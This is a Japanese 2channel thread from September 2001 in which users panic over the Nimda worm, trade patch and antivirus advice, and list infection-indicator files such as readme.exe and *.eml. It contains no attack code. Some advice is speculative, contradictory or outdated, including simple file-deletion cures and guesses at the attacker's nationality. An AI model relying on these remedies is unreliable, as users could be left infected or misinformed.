それってIEの最新バージョンを入れようとしてセットアップに失敗してない?
一部のDLLとかがIEの最新バージョンになっていて、不整合状態になっていると思う。
>>250
感謝。どなたかは知らぬが親切心に頭が下がる思いです。
それってIEの最新バージョンを入れようとしてセットアップに失敗してない?
一部のDLLとかがIEの最新バージョンになっていて、不整合状態になっていると思う。
>>250
感謝。どなたかは知らぬが親切心に頭が下がる思いです。
264 : :01/09/19 11:32 ID:87S0kctg
え、俺5.01sp2入れちゃったよ。
それじゃダメなの?
5.5だとうちのパソと相性悪くてエラーでまくりなんだよね。
それじゃダメなの?
5.5だとうちのパソと相性悪くてエラーでまくりなんだよね。
265 : :01/09/19 11:33 ID:OIgogmyI
266 : :01/09/19 11:33 ID:qSOu2Upo
267 : :01/09/19 11:34 ID:jBy9Jubo
感染している人数って
268 :超初心者:01/09/19 11:34 ID:OwlMzofk
なんのことやらさっぱりわからないです・・・
一応言われたのをダウンロードしに行くといったんだけど
一応なんでもOKとしていたらダウンロードに12時間てでて
キャンセルしてきました(T∀T) 電話線つかってるし・・・
こんな私はまず何をすればよいのでしょう。
今使っているのはバージョン4とヘルプで見てなっていました。
みなさんよろしくお願いします・・・
一応言われたのをダウンロードしに行くといったんだけど
一応なんでもOKとしていたらダウンロードに12時間てでて
キャンセルしてきました(T∀T) 電話線つかってるし・・・
こんな私はまず何をすればよいのでしょう。
今使っているのはバージョン4とヘルプで見てなっていました。
みなさんよろしくお願いします・・・
269 : :01/09/19 11:34 ID:CIjuhvgQ
270 :初心者1号:01/09/19 11:34 ID:zsQE2Q3w
みなさん、ありがとうございました。
おかげさまでIE5.5 SP2をDLしました。
これからも速報板にはお世話になります。
では、よろしくお願いします!
おかげさまでIE5.5 SP2をDLしました。
これからも速報板にはお世話になります。
では、よろしくお願いします!
271 :林檎コロッケ:01/09/19 11:35 ID:Le80enrg
教えて下さい。
とりあえずアップデートでセキュリティ問題の修正プログラムというのを
ダウンロードしてる最中なんですがこれでいいのですか。
最初ダウンロート残り時間が38分でしたが、48、1時間18分と
増えていきます。
不安です。
初心者なんです、よろしくお願いします。
とりあえずアップデートでセキュリティ問題の修正プログラムというのを
ダウンロードしてる最中なんですがこれでいいのですか。
最初ダウンロート残り時間が38分でしたが、48、1時間18分と
増えていきます。
不安です。
初心者なんです、よろしくお願いします。
272 : :01/09/19 11:35 ID:rlD4PB5g
すまねえ
ドシロートなんだがIE5.5のSP2をダウンロードすると途中の「タスクスケジューラの署名を確認しています」のところまでいくと「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、最後までいかないんだけど・・
何故か?
ドシロートなんだがIE5.5のSP2をダウンロードすると途中の「タスクスケジューラの署名を確認しています」のところまでいくと「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、最後までいかないんだけど・・
何故か?
273 :ナナシサソ:01/09/19 11:35 ID:uy8Pfu/w
>>263
とりあえず、おとなしく2ちゃんでも見ておきなさい…
で、あやしげなURL、特に、
「ここのサーバーも感染してるよ!http://www.XXXXXX~~/」
なんてのはクリックしないこと。
とりあえず、おとなしく2ちゃんでも見ておきなさい…
で、あやしげなURL、特に、
「ここのサーバーも感染してるよ!http://www.XXXXXX~~/」
なんてのはクリックしないこと。
274 : :01/09/19 11:36 ID:HO83CofY
ファイアウォール入れてるけど、大丈夫?
275 :269:01/09/19 11:36 ID:CIjuhvgQ
276 : :01/09/19 11:36 ID:V0EVsFhs
IE5.5入れるとモナーがズレルでしょ
277 : :01/09/19 11:36 ID:Jv..cQeQ
Readme.exe2個検出・・・(汗)
\windows\option\printia\xj-800とかいう所にまとめてあった
\windows\option\printia\xj-800とかいう所にまとめてあった
278 :^^。:01/09/19 11:36 ID:YqOIBj/g
279 : :01/09/19 11:36 ID:1L5pANOU
ログの速度見ると、とりあえずパニックは収束したかな?
あとはこのウイルスが他のファイルへの潜伏性を持つかに
かかっているって所か
あとはこのウイルスが他のファイルへの潜伏性を持つかに
かかっているって所か
280 : :01/09/19 11:36 ID:tuWeHvZk
281 : :01/09/19 11:36 ID:p0HcAdmo
感染した場合の具体的被害はどのようなものなのでしょうか?
282 :名無し:01/09/19 11:36 ID:r9Obg67M
283 :バカ:01/09/19 11:36 ID:RloGqjUs
もし感染してたら readme.exe と readme.eml を
削除するだけでいいの?
削除するだけでいいの?
284 : :01/09/19 11:37 ID:qasMGDqo
*.eml で検索したけれど、古いファイルが10個くらい。
readme.exe も、readme.eml もないけど。
eml という拡張子のファイルがあるだけで、感染してるってこと?
readme.exe も、readme.eml もないけど。
eml という拡張子のファイルがあるだけで、感染してるってこと?
285 : :01/09/19 11:37 ID://okMxmk
上で言われてる検索はクリア。
朝この事知って速攻でIE5.5SP2に更新。
これでOK?
朝この事知って速攻でIE5.5SP2に更新。
これでOK?
286 : :01/09/19 11:37 ID:lytVXhMI
わからなくて、何度も失敗しつつも
何とかSP2に更新できました。
そのあと、アイコンに「インターネットに接続」って、
加わってたんだけど、それも何か操作しなければいけませんか?
何とかSP2に更新できました。
そのあと、アイコンに「インターネットに接続」って、
加わってたんだけど、それも何か操作しなければいけませんか?
287 : :01/09/19 11:38 ID:NlvHTnzs
288 :超初心者:01/09/19 11:38 ID:OwlMzofk
289 : :01/09/19 11:38 ID:bq3Ce/eg
サイバーテロかよ
290 : :01/09/19 11:38 ID:H/4ljnnI
来た!!!!!!!!!!!!!!!!!!!
いま、いろいろまわってたら、
ヘンなモンをダウンロードしますか?って出てきた!
SP2入れたのに!!!!!!!!!!!!!
ダウンロードサイト「ふりっぽ」でした(たぶん)。
恐い!SP2入れただけじゃダメなん?
いま、いろいろまわってたら、
ヘンなモンをダウンロードしますか?って出てきた!
SP2入れたのに!!!!!!!!!!!!!
ダウンロードサイト「ふりっぽ」でした(たぶん)。
恐い!SP2入れただけじゃダメなん?
291 : :01/09/19 11:38 ID:XDNpbKcY
>284
感染してる可能性があるってだけ。
オンラインスキャンかなんかでそのファイルを検査するべき。
感染してる可能性があるってだけ。
オンラインスキャンかなんかでそのファイルを検査するべき。
>>268
とりあえず雑誌の付録や店頭のプロバイダ販促用CD-ROMをゲットしてきて、
IE5.01SP2かIE5.5SP2にすることを勧める。
>>271
たぶんダウンロード速度が遅いのでしょう。そのまま待つか、
電話回線のように課金が気になるのならIE5.01SP2 or IE5.5SP2
だけインストールしておくと良い。
>272
タスクスケジューラは今回のワームには影響を与えないはずなので、
とりあえず必要はないと思う。
とりあえず雑誌の付録や店頭のプロバイダ販促用CD-ROMをゲットしてきて、
IE5.01SP2かIE5.5SP2にすることを勧める。
>>271
たぶんダウンロード速度が遅いのでしょう。そのまま待つか、
電話回線のように課金が気になるのならIE5.01SP2 or IE5.5SP2
だけインストールしておくと良い。
>272
タスクスケジューラは今回のワームには影響を与えないはずなので、
とりあえず必要はないと思う。
293 : :01/09/19 11:39 ID:H/4ljnnI
294 :_:01/09/19 11:39 ID:.FNeXM3I
厨質でスマソ
IE6ダウンロードしようとすると、クックタイム(?)が壊れた(破れた)
みたいな表示が出てダウンロードできない……
説明書見たが載ってない。困った。
IE6ダウンロードしようとすると、クックタイム(?)が壊れた(破れた)
みたいな表示が出てダウンロードできない……
説明書見たが載ってない。困った。
295 : :01/09/19 11:39 ID:mxUXkeNs
>>ttp://www.stride.co.jp/~z32/cgi-bin/worm.cgi
ここリアルタイムで収集してるんだそうだ。
ここリアルタイムで収集してるんだそうだ。
296 : :01/09/19 11:39 ID:qSOu2Upo
297 :284:01/09/19 11:40 ID:qasMGDqo
298 : :01/09/19 11:40 ID:CIjuhvgQ
299 :質問:01/09/19 11:40 ID:2xMpMAT6
javaスクリプトのセキュリティーですが、
無効にすればいいのでしょうか?
無効にすればいいのでしょうか?
300 : :01/09/19 11:40 ID:XDNpbKcY
>294
ActiveXをオフにしてない?
ActiveXをオフにしてない?
誰か駆除の方法教えてくれ〜
302 : :01/09/19 11:41 ID:noRjlvxY
proxomitron入れてると少しは役に立つ?
303 :質問:01/09/19 11:41 ID:2xMpMAT6
セキュリティーレベルは高いにしました。
ウィン2000です。
ウィン2000です。
305 :アシ:01/09/19 11:41 ID:P8sV8xgI
スマヌが誰か纏めて欲しいなり
・ウイルスに感染した際におこる症状
・感染を防ぐ為の対処方
・感染を確認する方法
・感染した際の治療方法
他力本願(゚д゚)ウマー
・ウイルスに感染した際におこる症状
・感染を防ぐ為の対処方
・感染を確認する方法
・感染した際の治療方法
他力本願(゚д゚)ウマー
306 : :01/09/19 11:41 ID:7y1npfxY
誰かスーパー初心者に分かるように説明して下さい。お願いします。
307 : :01/09/19 11:42 ID:NmYNJujQ
駆除の方法って事は鬱ってしまったのか?>>301
308 : :01/09/19 11:42 ID://okMxmk
あーもうっ、何度見てもSP2をプレステ2って読んじまう。
309 :対処方法:01/09/19 11:43 ID:byucTCuc
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
上記作業は http://windowsupdate.microsoft.com/?IE で行う。
共通
3.ウィルスチェックソフトのパターンファイル更新
(NortonAntivirus2001で9/19にパターン更新すれば発見可能)
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
***感染チェック***
1.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MS社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
上記作業は http://windowsupdate.microsoft.com/?IE で行う。
共通
3.ウィルスチェックソフトのパターンファイル更新
(NortonAntivirus2001で9/19にパターン更新すれば発見可能)
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
***感染チェック***
1.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
→readme.exe, readme.emlの感染チェック可能
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
→readme.exeの感染チェック可能
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MS社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
310 : :01/09/19 11:43 ID:lytVXhMI
なんか、わかんない…。
一応、更新したけど、不安。
会社のPCだから、まーいいか。
一応、更新したけど、不安。
会社のPCだから、まーいいか。
311 : :01/09/19 11:43 ID:70l4IFsk
312 : :01/09/19 11:43 ID:lonPx4GA
>305
感染する可能性のあるOSとブラウザも追加キボー
感染する可能性のあるOSとブラウザも追加キボー
313 :ななし:01/09/19 11:43 ID:Z8TToPWU
ココ読んで、IE5.5sp2をDLした。
その後、すぐに、
*.eml
readme.exe
MEP51B3.TMP.EXE
を検索。結果、何もなし。
とりあえず、安心。
教えてくれた人、ありがとう。
その後、すぐに、
*.eml
readme.exe
MEP51B3.TMP.EXE
を検索。結果、何もなし。
とりあえず、安心。
教えてくれた人、ありがとう。
314 :じゃあ:01/09/19 11:44 ID:qgdGXqcg
ハードディスク検索して*.emlがなかったら、
今のところは感染してないってことでいいんですか?
今のところは感染してないってことでいいんですか?
>>305
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
>>306
感染しているかどうかを調べるにはウイルスチェックのソフトウエア。
もちろんそれぞれのソフトでパターンファイルを最新のモノに更新するように。
駆除できたり、感染していない場合は、IEを最新版に(できればIE6に)バージョンアップ。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
>>306
感染しているかどうかを調べるにはウイルスチェックのソフトウエア。
もちろんそれぞれのソフトでパターンファイルを最新のモノに更新するように。
駆除できたり、感染していない場合は、IEを最新版に(できればIE6に)バージョンアップ。
316 : :01/09/19 11:44 ID:Hvn1578.
かちゅ〜しゃ便利なんでここんとこWindows中心に使ってだけど、やっぱMacに戻るわ俺・・・
なんでこういう自体になるのか。呆れて開いた口がふさがらん。
317 : :01/09/19 11:45 ID:Hvn1578.
馬鹿IMめ。事態だ。
318 :便裸殿:01/09/19 11:45 ID:TgjfRWiE
サイバーテロだ
319 : :01/09/19 11:46 ID:qasMGDqo
>>306
IEのヴァージョンが5.01以下だと、ウィルスに感染したWEBサイトを見る
だけで、感染しちゃうらしい。Windows Update で、IEの5.5 SP2 をDLする。
その前に、感染してないかどうか、PCの「ファイル検索」で、*eml、
readme.exe を検索してみたほうがいい。…と私も初心者だけど、こう
理解しました。あってるのかな…。
IEのヴァージョンが5.01以下だと、ウィルスに感染したWEBサイトを見る
だけで、感染しちゃうらしい。Windows Update で、IEの5.5 SP2 をDLする。
その前に、感染してないかどうか、PCの「ファイル検索」で、*eml、
readme.exe を検索してみたほうがいい。…と私も初心者だけど、こう
理解しました。あってるのかな…。
320 : :01/09/19 11:46 ID:VXccxyFg
IE6で感染サイトにいってみたけど、どこもやたら重い。
あと、「オーディオまたはビデオのリンクがクリックされました〜(略)
項目を再生しますか?」というメッセージが出て、いいえを選んでも
何故かメディアプレーヤーが立ち上がるんだけど・・・これは何?
あと、*.emlでHD検索したらTemporaryInternetフォルダにreadme[1].emlって
のが3つほど入ってた(日付・時間はちょうど感染サイトを覗いた時間)。
あと、「オーディオまたはビデオのリンクがクリックされました〜(略)
項目を再生しますか?」というメッセージが出て、いいえを選んでも
何故かメディアプレーヤーが立ち上がるんだけど・・・これは何?
あと、*.emlでHD検索したらTemporaryInternetフォルダにreadme[1].emlって
のが3つほど入ってた(日付・時間はちょうど感染サイトを覗いた時間)。
321 : :01/09/19 11:46 ID:yNH4JnFA
322 : :01/09/19 11:46 ID:XDNpbKcY
マカなんだけど。hotmailで
感染サイトに「感染の連絡」を入れても
平気ですか?2次感染とかならないですか?
感染サイトに「感染の連絡」を入れても
平気ですか?2次感染とかならないですか?
感謝!!!!
326 :104:01/09/19 11:48 ID:bi15wNtM
ページを表示できません
DL出来ないっす(TT
Win2000なんですが・・
DL出来ないっす(TT
Win2000なんですが・・
327 : :01/09/19 11:49 ID:jRZmvYDw
5.5SP2より6.0の方がやっぱり安心なの?
328 : :01/09/19 11:49 ID:mxUXkeNs
329 : :01/09/19 11:48 ID:RloGqjUs
331 :294:01/09/19 11:50 ID:.FNeXM3I
332 :251:01/09/19 11:50 ID:NAhk67QQ
333 : :01/09/19 11:50 ID:70l4IFsk
ttp://61.74.166.11/が総元締めか?ここも感染してるみたいだけど。
fuck USA Governmentとのこと。
contact:[email protected] ということで犯人は中国人?
fuck USA Governmentとのこと。
contact:[email protected] ということで犯人は中国人?
334 :314:01/09/19 11:52 ID:qgdGXqcg
335 : :01/09/19 11:52 ID:r.RMappI
ところで、win98で鬱った人いるの?
>>332
> とりあえず再起動したらSP2当てれるようになりました
いや、単に再起動しないと置き換えることが出来ないファイルがあっただけ。
Windowsの標準的な振る舞いなんで、ウイルスの感染とは無関係だよ。
> とりあえず再起動したらSP2当てれるようになりました
いや、単に再起動しないと置き換えることが出来ないファイルがあっただけ。
Windowsの標準的な振る舞いなんで、ウイルスの感染とは無関係だよ。
337 : :01/09/19 11:52 ID:J6gqWM9Q
338 : :01/09/19 11:53 ID:bD0/QBps
ファイルサイズはいくらですか?
339 : :01/09/19 11:53 ID:XDNpbKcY
340 :333のうんこたれぞうくんへ:01/09/19 11:53 ID:rUiXeQag
やれやれ、なにもしらない馬鹿がハッカー気取りでいうなよ。
わざわざ追跡されるようなへまはしねえよ。
わざわざ追跡されるようなへまはしねえよ。
341 : :01/09/19 11:54 ID:kytsujbk
342 : :01/09/19 11:54 ID:qasMGDqo
343 : :01/09/19 11:54 ID:FbuD5hAI
インターネットオプションのセキュリティ(インターネット)を高にしたらクッキーをうけつけるにしないと2chに書き込みできな。
344 : :01/09/19 11:55 ID:p0HcAdmo
なんかかちゅ〜しゃが重くなってきた
2ch大丈夫か?
2ch大丈夫か?
345 :ナナシサソ:01/09/19 11:55 ID:uy8Pfu/w
W32.Nimda.A@mm、とりあえずの対策(気休め)
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000321.htm
・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。
・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。
↑
そうなのか?!
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000321.htm
・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。
・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。
↑
そうなのか?!
346 : :01/09/19 11:56 ID:MM8OKJgc
試しに、使っていないPCに感染させてみよう。
347 : :01/09/19 11:57 ID:nyeYs6WI
348 : :01/09/19 11:57 ID:RloGqjUs
350 : :01/09/19 11:57 ID:VXccxyFg
351 : :01/09/19 11:57 ID:JkcCzA82
昨晩ホットメールからサインアウトしたところmsnに強制転送され当該ファイルをダウンロードされました。
ZONEALARMに引っ掛かって確認したときには同じようなファイルが2つ・・。
ゴミ箱送りにしておきましたが、コイツだったとは・・
会社でこの件を知りましたが、帰ってPC見るのが欝だ。
>>335
win98は感染しないんですか?
ZONEALARMに引っ掛かって確認したときには同じようなファイルが2つ・・。
ゴミ箱送りにしておきましたが、コイツだったとは・・
会社でこの件を知りましたが、帰ってPC見るのが欝だ。
>>335
win98は感染しないんですか?
352 : :01/09/19 11:57 ID:qasMGDqo
353 :初心者1号:01/09/19 11:58 ID:zsQE2Q3w
354 : :01/09/19 11:58 ID:1L5pANOU
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
もしかしたら他のファイルに潜伏するかもしれない。
感染の有無の確認
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンで鍛代とかの情報など、追加のフォロー宜しく!>ALL
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
もしかしたら他のファイルに潜伏するかもしれない。
感染の有無の確認
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンで鍛代とかの情報など、追加のフォロー宜しく!>ALL
355 : :01/09/19 11:59 ID:WbSQL4Qc
356 : :01/09/19 11:59 ID:V0EVsFhs
357 : :01/09/19 12:00 ID:PPzqfDyw
マイクロソフトの最悪バージョンUPを嫌ったユーザーを狙って最悪なテロ行為。
激しい憤りを感じます。
激しい憤りを感じます。
358 : :01/09/19 12:00 ID:H4gW7jNw
で、2chは大丈夫なんだろーな?
359 :報告:01/09/19 12:01 ID:cVbss392
中国のシンセンからのメールにくっ付いてきやがった!!!
360 : :01/09/19 12:01 ID:FuOd4MA6
361 :331:01/09/19 12:01 ID:.FNeXM3I
>>339さま
>>342さま
たびたびすみません。
セキュリティの設定を調べてみました。
ActiveX関連はすべて「有効」
セキュリティレベルは「中」
となってました。感染以外の話題ですみませんです。
>>342さま
たびたびすみません。
セキュリティの設定を調べてみました。
ActiveX関連はすべて「有効」
セキュリティレベルは「中」
となってました。感染以外の話題ですみませんです。
362 :バiタ:01/09/19 12:01 ID:RpkGMlcw
ちなみにネスケは奴ら自らスパイウェア仕込んでたた前科があるから
まったく信用できねえ。
MSもワードに仕込んでたから信用できねえ。
結局、どいつもこいつも信用できねえ。
まったく信用できねえ。
MSもワードに仕込んでたから信用できねえ。
結局、どいつもこいつも信用できねえ。
363 : :01/09/19 12:01 ID:XDNpbKcY
Meについてるシステムの復元+感染ファイル削除とかでは無理かな・・・
実験したいがマシンがない(汗
実験したいがマシンがない(汗
364 : :01/09/19 12:02 ID:CIjuhvgQ
>>354
この部分も追加した方が良いんじゃないか?
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすましています。
感染したPCはCドライブをネットワーク共有する
この部分も追加した方が良いんじゃないか?
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすましています。
感染したPCはCドライブをネットワーク共有する
365 : :01/09/19 12:02 ID:qq6rhHg6
うちの会社のサーバーに感染しちゃってるYO!
366 : :01/09/19 12:02 ID:nyeYs6WI
mep????.tmp
に変化するみたいだから、いちお
mep
でも検索した方が良いよ。
に変化するみたいだから、いちお
mep
でも検索した方が良いよ。
367 :nanasisan(出しゃばり):01/09/19 12:02 ID:KSWVQD0E
368 :名無しさん:01/09/19 12:02 ID:t5ePDc5w
考えてみりゃ、msnなんて半年以上も見てなかったよ。
どうせだから、5.5sp2から6にしといた。
どうせだから、5.5sp2から6にしといた。
369 :名無しさん:01/09/19 12:02 ID:VKE9ZaK.
msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19)
https://www.netsecurity.ne.jp/article/9/2842.html
https://www.netsecurity.ne.jp/article/9/2842.html
370 :1:01/09/19 12:03 ID:mxUXkeNs
◆◆◆ さらに追加情報 ◆◆◆
このウイルスはLANの共有フォルダを使っても自己増殖ワーム行為を
するそうです。
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
わりとパニックになります つーか かなり。
◆ いろいろ終わり ◆
このウイルスはLANの共有フォルダを使っても自己増殖ワーム行為を
するそうです。
社内に一人でも対策してないひとがいてノーパスとかにしていた場合
わりとパニックになります つーか かなり。
◆ いろいろ終わり ◆
371 : :01/09/19 12:03 ID:eH8GVVTM
誰か教えて。
emlって拡張子のやつがあったら、
感染してる可能性あるの?
2つあったんだけど・・・
emlって拡張子のやつがあったら、
感染してる可能性あるの?
2つあったんだけど・・・
372 : :01/09/19 12:04 ID:J6gqWM9Q
373 :初心者55号:01/09/19 12:04 ID:EZWqIQ0.
IE5.0から
5.01SP2or5.5SP2のどちらにバージョンUPすれば
良いのか教えてください。
どっちでもよいのかな?
5.01SP2or5.5SP2のどちらにバージョンUPすれば
良いのか教えてください。
どっちでもよいのかな?
374 : :01/09/19 12:04 ID:qSOu2Upo
375 : :01/09/19 12:04 ID:u4ESP9oo
なんかしらんが強烈な勢いでアタックかけられてるんだが・・・。
376 : :01/09/19 12:05 ID:n5wmWdo2
近所にCD付属のPC本おいてるトコ無かったし
アップデートもあと6時間以上も掛かるし・・・
2ch以外は行かないでおこう(TДT)
アップデートもあと6時間以上も掛かるし・・・
2ch以外は行かないでおこう(TДT)
377 : :01/09/19 12:05 ID:cFHCRmHk
379 : :01/09/19 12:06 ID:qqVxz.uA
380 : :01/09/19 12:06 ID:qasMGDqo
381 : :01/09/19 12:06 ID:VXccxyFg
382 :!:01/09/19 12:07 ID:3/bSVvek
!
383 :113:01/09/19 12:07 ID:LNEMDmj.
初心者が思う疑問
大変な事態だと思うのに、
・スレのスピードが遅い
・ニュースでやってない(いいとも見てるからかw)
大変な事態だと思うのに、
・スレのスピードが遅い
・ニュースでやってない(いいとも見てるからかw)
384 : :01/09/19 12:07 ID:g1MKGlEI
385 : :01/09/19 12:08 ID:p5f2KD92
386 : :01/09/19 12:08 ID:QT5aH0Bw
>370=>378
あんたかっこいい。無駄口利くヤツのがどーみても厨房。嫉妬だろ?
あんたかっこいい。無駄口利くヤツのがどーみても厨房。嫉妬だろ?
387 : :01/09/19 12:08 ID:QzWYZO/c
emlってHTML形式のメールの拡張子だから、
例え見つかったとしても、それが以前に自分の書いた
見覚えのあるメールだったら、それはウイルスではないよ。
一応、保存しておく理由がなければ消去しておいたほうが安心だけど
例え見つかったとしても、それが以前に自分の書いた
見覚えのあるメールだったら、それはウイルスではないよ。
一応、保存しておく理由がなければ消去しておいたほうが安心だけど
388 :素朴:01/09/19 12:08 ID:9pVtadno
IE6って使いやすくなってるん?
389 : :01/09/19 12:08 ID:iOVUc1CA
みんなまだ知らないのかな
会社とかでは騒ぎになってるのだろうか?
会社とかでは騒ぎになってるのだろうか?
390 :・:01/09/19 12:09 ID:McRIbKxw
このウイルスってどうやって広がってるの(WEBで)
メールとかで広がってくのは理屈が分かるけど
WEB見ただけで感染して、その感染した人がメール送っても感染?
ネット上でかってに自己繁殖ってどういう事さ・・・。
感染した人がHPの更新とかしたら、もうそのHPはウイルス元って事?
色々調べたいけど、感染するのコワイから
今日だけ教えてちゃんを許して・・・・。
メールとかで広がってくのは理屈が分かるけど
WEB見ただけで感染して、その感染した人がメール送っても感染?
ネット上でかってに自己繁殖ってどういう事さ・・・。
感染した人がHPの更新とかしたら、もうそのHPはウイルス元って事?
色々調べたいけど、感染するのコワイから
今日だけ教えてちゃんを許して・・・・。
391 : :01/09/19 12:09 ID:J6gqWM9Q
>>378
SPとか、俺にはさっぱりわからん。
ばっかじゃないのか?
Winを使ってるやつがいるから、CodeBlueもNimda
もこんな事態になるんだよ、、、
こちとらいい迷惑だよ。ログは増大するは通信速度は
低下するわ。
氏ね M$信者
SPとか、俺にはさっぱりわからん。
ばっかじゃないのか?
Winを使ってるやつがいるから、CodeBlueもNimda
もこんな事態になるんだよ、、、
こちとらいい迷惑だよ。ログは増大するは通信速度は
低下するわ。
氏ね M$信者
392 : :01/09/19 12:09 ID:g1MKGlEI
393 :名無しさんおなかいっぱい。:01/09/19 12:10 ID:ceLFif3I
モナー板を頻繁に見るなら5、0だね
394 :asd:01/09/19 12:10 ID:F2AdiCCw
eml≠HTML形式メイルだYO!
395 :ナナシサン:01/09/19 12:10 ID:NcYZVJw.
>390
前スレから読むニダ
前スレから読むニダ
396 : :01/09/19 12:10 ID:OO3wQbOI
Nimda はどうも、 ADMIN を逆から読んだもののようですね。
397 : :01/09/19 12:10 ID:Ixk/zxLM
関係ない話で悪いのですが、
IE5.5 SP2についてくるインターネットツールって何ですか?
IE5.5 SP2についてくるインターネットツールって何ですか?
398 : :01/09/19 12:10 ID:AXdw0Hxk
親切にSP2挿れてあげたらPC動かなくなった。鬱だ
399 : :01/09/19 12:10 ID:n5wmWdo2
400 : :01/09/19 12:11 ID:FuOd4MA6
401 :_:01/09/19 12:11 ID:jzKbqutU
IE6って見た目はWINDOWS−XPちっくなの?
402 : :01/09/19 12:11 ID:s3PsnOCQ
まだ、けっこう知らない人が多いみたいだから、あちこちの大きな
サイトのBBSで、みんなにも教えてあげようよ
サイトのBBSで、みんなにも教えてあげようよ
教えて君になってしまった・・・
検索してきます<ネスケ
検索してきます<ネスケ
404 :_:01/09/19 12:11 ID:o12ilfao
405 :ガシシ右松:01/09/19 12:12 ID:leFSdsqc
>>290
「ふりっぽ」やられてるんだ!!
「ダウンロードしますか?」ダイアログを
キャンセルしてもreadme.exeとreadme.emlはできてるよ。
とりあえず「スタート」→「ファイルやフォルダの検索」で、
readme.exeと*.eml 探して、
見つけ次第削除。
あとさっき教えてもらったんだけど、
「temporary internet files」に残ってるやつも抹殺。
「ふりっぽ」やられてるんだ!!
「ダウンロードしますか?」ダイアログを
キャンセルしてもreadme.exeとreadme.emlはできてるよ。
とりあえず「スタート」→「ファイルやフォルダの検索」で、
readme.exeと*.eml 探して、
見つけ次第削除。
あとさっき教えてもらったんだけど、
「temporary internet files」に残ってるやつも抹殺。
406 : :01/09/19 12:13 ID:XDNpbKcY
407 : :01/09/19 12:13 ID:VXccxyFg
トレンドマイクロのオンラインスキャンのページ、やたら重い・・・
408 : :01/09/19 12:13 ID:70l4IFsk
409 : :01/09/19 12:14 ID:1L5pANOU
状況報告ver1.01(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
→java関連とダウンロードのファイルのダウンロードを不許可。
現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
もしかしたら他のファイルに潜伏するかもしれない。
メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
